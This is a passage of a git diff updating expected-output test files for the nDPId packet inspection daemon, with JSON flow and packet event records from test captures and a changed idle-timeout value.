+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":9077,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":80,"total-not-detected-flows":29,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18215,"global_ts_msec":1534244033215} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9077/29 diff --git a/test/results/iphone.pcap.out b/test/results/iphone.pcap.out index 48bb5ef32..2aeb1eed3 100644 --- a/test/results/iphone.pcap.out +++ b/test/results/iphone.pcap.out @@ -78,8 +78,8 @@ 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="} 00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -89,51 +89,51 @@ 